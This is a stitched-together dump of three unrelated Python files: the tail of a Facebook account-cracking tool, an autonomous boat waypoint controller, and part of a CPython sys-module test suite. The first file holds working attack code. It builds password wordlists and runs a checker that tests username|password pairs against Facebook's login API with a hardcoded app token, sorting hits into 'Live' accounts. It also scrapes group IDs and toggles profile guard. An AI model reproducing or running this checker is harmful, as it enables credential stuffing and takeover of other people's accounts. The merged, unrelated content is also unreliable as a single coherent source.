file.write('%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s' % (a, c, a, b, b, a, b, c, c, a, c, b, a, a, b, b, c, c, a, d, b, d, c, d, d, d, d, a, d, b, d, c, a, e, a, f, a, g, a, h, b, e, b, f, b, g, b, h, c, e, c, f, c, g, c, h, d, e, d, f, d, g, d, h, e, a, f, a, g, a, h, a, e, b, f, b, g, b, h, b, e, c, f, c, g, c, h, c, e, d, f, d, g, d, h, d, d, d, a, f, g, a, g, h, f, g, f, h, f, f, g, f, g, h, g, g, h, f, h, g, h, h, h, g, f, a, g, h, b, f, g, b, g, h, c, f, g, c, g, h, d, f, g, d, g, h, a, i, a, j, a, k, i, e, i, j, i, k, b, i, b, j, b, k, c, i, c, j, c, k, e, k, j, a, j, b, j, c, j, d, j, j, k, a, k, b, k, c, k, d, k, k, i, l, i, m, i, n, j, l, j, m, j, n, j, k))
wg = 0
while wg < 100:
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while en < 100:
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while word < 100:
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while gen < 100:
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print '\n\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97m %s.txt' % a
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except IOError as e:
print '\x1b[1;91m[!] Make file failed'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def check_akun():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[?] \x1b[1;92mIsi File\x1b[1;91m : \x1b[1;97musername|password'
print 52 * '\x1b[1;97m\xe2\x95\x90'
live = []
cek = []
die = []
try:
file = raw_input('\x1b[1;91m[+] \x1b[1;92mFile \x1b[1;91m:\x1b[1;97m ')
list = open(file, 'r').readlines()
except IOError:
print '\x1b[1;91m[!] File not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
pemisah = raw_input('\x1b[1;91m[+] \x1b[1;92mSeparator \x1b[1;91m:\x1b[1;97m ')
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
for meki in list:
username, password = meki.strip().split(str(pemisah))
url = 'https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=' + username + '&locale=en_US&password=' + password + '&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6'
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print '\x1b[1;97m[\x1b[1;92mLive\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
elif 'www.facebook.com' in mpsh['error_msg']:
cek.append(password)
print '\x1b[1;97m[\x1b[1;93mCheck\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
else:
die.append(password)
print '\x1b[1;97m[\x1b[1;91mDie\x1b[1;97m] \x1b[1;97m' + username + ' | ' + password
print '\n\x1b[1;91m[+] \x1b[1;97mTotal\x1b[1;91m : \x1b[1;97mLive=\x1b[1;92m' + str(len(live)) + ' \x1b[1;97mCheck=\x1b[1;93m' + str(len(cek)) + ' \x1b[1;97mDie=\x1b[1;91m' + str(len(die))
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def grupsaya():
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
else:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
jalan('\x1b[1;91m[\xe2\x9c\xba] \x1b[1;92mPlease wait \x1b[1;97m...')
print 52 * '\x1b[1;97m\xe2\x95\x90'
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token=' + toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p['name']
id = p['id']
f = open('grupid.txt', 'w')
listgrup.append(id)
f.write(id + '\n')
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mName \x1b[1;91m:\x1b[1;97m ' + str(nama)
print '\x1b[1;91m[+] \x1b[1;92mID \x1b[1;91m:\x1b[1;97m ' + str(id)
print 52 * '\x1b[1;97m='
print '\n\r\x1b[1;91m[+] \x1b[1;97mTotal Group \x1b[1;96m%s' % len(listgrup)
print '\x1b[1;91m[+] \x1b[1;97mSaved \x1b[1;91m: \x1b[1;97mgrupid.txt'
f.close()
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except (KeyboardInterrupt, EOFError):
print '\x1b[1;91m[!] Stopped'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except KeyError:
os.remove('grupid.txt')
print '\x1b[1;91m[!] Group not found'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
except requests.exceptions.ConnectionError:
print '\x1b[1;91m[\xe2\x9c\x96] No connection'
keluar()
except IOError:
print '\x1b[1;91m[!] Error when creating file'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
def guard():
global toket
os.system('clear')
try:
toket = open('login.txt', 'r').read()
except IOError:
print '\x1b[1;91m[!] Token not found'
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '║-> \x1b[1;37;40m1. Enable'
print '║-> \x1b[1;37;40m2. Disable'
print '║-> \x1b[1;31;40m0. Back'
print '\x1b[1;37;40m║'
g = raw_input('╚═\x1b[1;91m▶\x1b[1;97m ')
if g == '1':
aktif = 'true'
gaz(toket, aktif)
else:
if g == '2':
non = 'false'
gaz(toket, non)
else:
if g == '0':
lain()
else:
if g == '':
keluar()
else:
keluar()
def get_userid(toket):
url = 'https://graph.facebook.com/me?access_token=%s' % toket
res = requests.get(url)
uid = json.loads(res.text)
return uid['id']
def gaz(toket, enable=True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Authorization': 'OAuth %s' % toket}
url = 'https://graph.facebook.com/graphql'
res = requests.post(url, data=data, headers=headers)
print res.text
if '"is_shielded":true' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;92mActivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
if '"is_shielded":false' in res.text:
os.system('clear')
print logo
print 52 * '\x1b[1;97m\xe2\x95\x90'
print '\x1b[1;91m[\x1b[1;96m\xe2\x9c\x93\x1b[1;91m] \x1b[1;91mDeactivated'
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
lain()
else:
print '\x1b[1;91m[!] Error'
keluar()
if __name__ == '__main__':
login()
|
PBC_auto_brain.py
|
import time
import datetime as dt
import serial
from queue import Queue, Empty
from threading import Thread
import numpy as np
import os, sys
import maestro
from haversine import RangeAndBearing
# serial setups
time.sleep(0.25)
RCSer = serial.Serial('/dev/ttyUSB0',baudrate = 115200) # varies on which is plugged first
time.sleep(0.25)
SensorSer = serial.Serial('/dev/ttyACM0',baudrate = 115200) # consistent
time.sleep(0.25)
# maestro setup
Maestro = maestro.Controller('/dev/ttyACM1')
SteerChannel = 6
MotorChannel = 8
# servo settings, the 4x mult is due to quarter microsecs
microSecMin = 4*750 # -- turns boat left
microSecMax = 4*2500 # -- turns boat right
Maestro.setRange(SteerChannel, microSecMin, microSecMax)
Maestro.setAccel(SteerChannel,254) # basically max
Maestro.setSpeed(SteerChannel,100) # 0-255 close to max but slightly unkown, look in maestro code for more info
PWMlow = 0
PWMhigh = 127
# steering params
MAXRIGHT = 20
MAXLEFT = -20
def ScaleFxn(x, fromLow, fromHigh, toLow, toHigh):
x = (((x - fromLow) * (toHigh - toLow)) / (fromHigh - fromLow)) + toLow
return x
def ListenForRCData(RCStatusQueue):
RC_data_loc = [0, 0, 0, 0] # [AUTO, WAYPT, SteerCmd, ThrotCmd]
RC_data_send = [0, 0, 0, 0]
RC_steer_hist = [0]*10 # moving filter
while True:
# listen for RC data for the Ardu and send it into the queue
rawRCdata = RCSer.readline()
try:
rawRCdata = rawRCdata.decode("utf-8")
if "Man" in rawRCdata:
RC_data_loc[0] = 0
elif "Aut" in rawRCdata:
RC_data_loc[0] = 1
if "WpLo" in rawRCdata:
RC_data_loc[1] = 0
elif "WpHi" in rawRCdata:
RC_data_loc[1] = 1
if len(rawRCdata.split("%")) > 1:
RC_steer_hist.append(float(rawRCdata.split("%")[0])) # steer cmd
RC_steer_hist.pop(0)
RC_data_loc[2] = np.mean(RC_steer_hist)
RC_data_loc[3] = float(rawRCdata.split("%")[1]) # throt cmd
## print('rc data: ',RC_data_loc)
RCSer.reset_input_buffer()
except:
print('error in rc data thread')
# put in queue
if RC_data_loc != RC_data_send:
RC_data_send = RC_data_loc.copy()
RCStatusQueue.put(RC_data_send)
def ListenForSensorData(GPSQueue, CompassQueue):
GPS_data_loc = [0,0,0,0,0,0] # [fix, quality, lat, lon, spd, ang]
GPS_data_send = [0,0,0,0,0,0]
Compass_data_loc = [0]
Compass_data_send = [0]
while True:
# listen for compass and gps data
rawsensorData = SensorSer.readline()
try:
rawsensorData = rawsensorData.decode("utf-8")
if "(deg)" in rawsensorData:
Compass_data_loc[0] = float(rawsensorData.split(' ')[-1])
elif "Fix:" in rawsensorData:
s = rawsensorData.find(":")
if rawsensorData[s+2].isdigit(): GPS_data_loc[0] = int(rawsensorData[s+2])
s = rawsensorData.find(":",s+2)
if rawsensorData[s+2].isdigit(): GPS_data_loc[1] = int(rawsensorData[s+2])
elif "Loc" in rawsensorData:
rawsensorData = rawsensorData[rawsensorData.find('Loc')+3:].split(',')
GPS_data_loc[2] = float(rawsensorData[0])
GPS_data_loc[3] = float(rawsensorData[1])
elif "(knts)" in rawsensorData:
GPS_data_loc[4] = float(rawsensorData.split(' ')[-1])
elif "Ang " in rawsensorData:
GPS_data_loc[5] = float(rawsensorData.split(' ')[-1])
SensorSer.reset_input_buffer()
else:
pass
except:
print('error in sensor data thread')
pass
# put in queue
if GPS_data_loc != GPS_data_send:
GPS_data_send = GPS_data_loc.copy()
GPSQueue.put(GPS_data_send)
if Compass_data_loc != Compass_data_send:
Compass_data_send = Compass_data_loc.copy()
CompassQueue.put(Compass_data_send)
# start the listener threads
RCStatusQueue = Queue()
RCListenerThread = Thread(target=ListenForRCData, args=(RCStatusQueue,))
RCListenerThread.setDaemon(True)
RCListenerThread.start()
print('started RCListenerThread thread...')
GPSQueue = Queue()
CompassQueue = Queue()
SensorListenerThread = Thread(target=ListenForSensorData, args=(GPSQueue,CompassQueue,))
SensorListenerThread.setDaemon(True)
SensorListenerThread.start()
print('started SensorListenerThread thread...')
LoopTargetTime = 10 # milliseconds
Timer_Hz = dt.datetime.now()
over_count = 0
general_count = 0
###########
RC_data = []
AUTO = False
WAYPT = False
SteerInput = 0 # ~ input -100 - +100, but not actually
SteerCmd = 0 # output -20 - 20
ThrotInput = 0 # ~ input -100 - +100, but not actually
ThrotCmd = 0 # output, 0 - 100
AUTO_RisingEdge = False
AUTO_FallingEdge = False
WAYPT_RisingEdge = False
AutoFlag = False
WptFlag = False
IDLE = False # post race completion mode
GPSfix = 0
GPSquality = 0
GPSlat = 0.0
GPSlon = 0.0
GPSspd = 0.0
GPSang = 0.0
Compass = 0.0
CompassOffset = 90 # Believe the rotation is +90 to the heading
wptRadius = 5 # meters, ~ 15 feet
# try to load waypoint array
if os.path.isfile('WayPoints.npy'):
WayPoints = np.load('WayPoints.npy')
else:
WayPoints = np.zeros((20,2)) # 20 waypoints of Lat Long
wptInd = 0 # which waypoint
try:
while True:
loop_start = dt.datetime.now() # update loop clock
# ------------- DATA inputs -------------------
# check RC queue for new data
while not RCStatusQueue.empty():
RC_data = RCStatusQueue.get()
# parse this into
AUTO = RC_data[0]
WAYPT = RC_data[1]
SteerInput = RC_data[2]
ThrotInput = RC_data[3]
# check GPS queue for new data
while not GPSQueue.empty():
GPS_data = GPSQueue.get()
# parse this into
GPSfix = GPS_data[0]
GPSquality = GPS_data[1]
GPSlat = GPS_data[2]
GPSlon = GPS_data[3]
GPSspd = GPS_data[4]
GPSang = GPS_data[5]
# check Compass queue for new data
while not CompassQueue.empty():
Compass_data = CompassQueue.get()
# parse this into
Compass = Compass_data[0] + CompassOffset
if Compass > 360: Compass = Compass - 360
# ------- edge detection -----------
if AUTO and not AutoFlag:
AUTO_RisingEdge = True
AutoFlag = True
else:
AUTO_RisingEdge = False
if not AUTO and AutoFlag:
AUTO_FallingEdge = True
AutoFlag = False
else:
AUTO_FallingEdge = False
if WAYPT and not WptFlag:
WAYPT_RisingEdge = True
WptFlag = True
else:
WAYPT_RisingEdge = False
if not WAYPT: WptFlag = False # reset the flag
# -- END - edge detection -----------
# ----- END ---- DATA inputs -------------------
if not AUTO: # manual mode
if WAYPT_RisingEdge:
print('Logging waypoint to wpt array')
#append gps
WayPoints[wptInd,0] = GPSlat
WayPoints[wptInd,1] = GPSlon
WayPoints[wptInd+1:,:]=0 # zero the array past this point
wptInd += 1 # uptick wpt array
np.save('WayPoints.npy',WayPoints)
print(WayPoints)
# ---------- Calculate control signals -------------------
SteerCmd = int(ScaleFxn(SteerInput,-100,100,-20,20))
ThrotCmd = int(ScaleFxn(ThrotInput,-100,100,0,100))
# ---- END - Calculate control signals -------------------
if AUTO_RisingEdge:
wptInd = 0
if AUTO_FallingEdge:
wptInd = 0
IDLE = False
DEBUG = False
if AUTO:
if not GPSfix and not DEBUG: print('no GPS fix... waiting...')
elif GPSfix or DEBUG:
if IDLE:
SteerCmd = 0
ThrotCmd = 0
else:
WptLat = WayPoints[wptInd,0]
WptLon = WayPoints[wptInd,1]
## GPSlat = 32.750330
## GPSlon = -117.202724
## sims = [[32.750407,-117.193167],[32.756678,-117.195709],[32.754522,-117.216169],[32.743998,-117.223547],[32.733403,-117.202390]]
## WptLat = sims[0][0]
## WptLon = sims[0][1]
Range, Bearing = RangeAndBearing(GPSlat,GPSlon,WptLat,WptLon)
## print('Distance: ', Range,' in meters')
## print('Bearing to next wpt: ',Bearing)
if Range < wptRadius:
print(' ')
print('Waypoint ',wptInd,' hit!!')
wptInd += 1
if WayPoints[wptInd,0] == 0 or WayPoints[wptInd,1] == 0:
IDLE = True
print(' ')
print('MISSION COMPLETE')
if not IDLE:
# transform Bearing to be 0-360 with 0 being east
if 0 < Bearing <= 180: B = Bearing
elif Bearing < 0:
B = 360 - abs(Bearing)
# transform H to be 0 east
H = Compass - 90
if H < 0: H = 360+H # i think this resolves it
H = abs(360-H)
if 0 < B - H < 180:
# turn left
SteerCmd = -1*(B-H)
print('Bearing: ',B,' Heading: ',H,' turn left')
elif 180 <= B - H:
# turn right
SteerCmd = 360 - B - H
print('Bearing: ',B,' Heading: ',H,' turn right')
elif -180 < B - H < 0:
# turn right
SteerCmd = -1*(B-H)
print('Bearing: ',B,' Heading: ',H,' turn right')
elif B - H < -180:
# turn left
SteerCmd = -360 - B + H
print('Bearing: ',B,' Heading: ',H,' turn left')
ThrotCmd = 100 # full speed ahead...
if (dt.datetime.now() - Timer_Hz).microseconds >= LoopTargetTime*1000:
Timer_Hz = dt.datetime.now()
# ---------- write control signals -------------------
if SteerCmd > 20: SteerCmd = 20 # clipping
elif SteerCmd < -20: SteerCmd = -20 # clipping
if -2 <= SteerCmd <= 2: SteerCmd = 0 # create a toleranced deadband
Maestro.setTarget(SteerChannel,int(ScaleFxn(SteerCmd,-20,20,microSecMin,microSecMax)))
if ThrotCmd > 85: ThrotCmd = 100 # clipping and also helping get full throttle out of the motor
if ThrotCmd < 4: ThrotCmd = 0 # create a toleranced deadband
MotorSendValue = int(ScaleFxn(ThrotCmd,0,100,PWMlow,PWMhigh))
if MotorSendValue < 80: MotorSendValue = 0 # clip since 80 is about the lowest to get motion due to friction and start torque
Maestro.setPWM(MotorChannel,MotorSendValue) # 0 - 127
# ---- END - write control signals -------------------
except KeyboardInterrupt:
pass
|
test_sys.py
|
import unittest, test.support
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
try:
sys.exit(0)
except SystemExit as exc:
self.assertEqual(exc.code, 0)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with one entry
# entry will be unpacked
try:
sys.exit(42)
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with integer argument
try:
sys.exit((42,))
except SystemExit as exc:
self.assertEqual(exc.code, 42)
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with string argument
try:
sys.exit("exit")
except SystemExit as exc:
self.assertEqual(exc.code, "exit")
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# call with tuple argument with two entries
try:
sys.exit((17, 23))
except SystemExit as exc:
self.assertEqual(exc.code, (17, 23))
except:
self.fail("wrong exception")
else:
self.fail("no exception")
# test that the exit machinery handles SystemExits properly
rc = subprocess.call([sys.executable, "-c",
"raise SystemExit(47)"])
self.assertEqual(rc, 47)
def check_exit_message(code, expected, env=None):
process = subprocess.Popen([sys.executable, "-c", code],
stderr=subprocess.PIPE, env=env)
stdout, stderr = process.communicate()
self.assertEqual(process.returncode, 1)
self.assertTrue(stderr.startswith(expected),
"%s doesn't start with %s" % (ascii(stderr), ascii(expected)))
# test that stderr buffer if flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
env = os.environ.copy()
env['PYTHONIOENCODING'] = 'latin-1'
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", env=env)
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
if os.name == "nt":
raise unittest.SkipTest(
"under Windows, test would generate a spurious crash dialog")
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertTrue(
b"Fatal Python error: Cannot recover from stack overflow" in err,
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
def test_dlopenflags(self):
if hasattr(sys, "setdlopenflags"):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a litte tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 5)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
self.assertIsInstance(sys.maxsize, int)
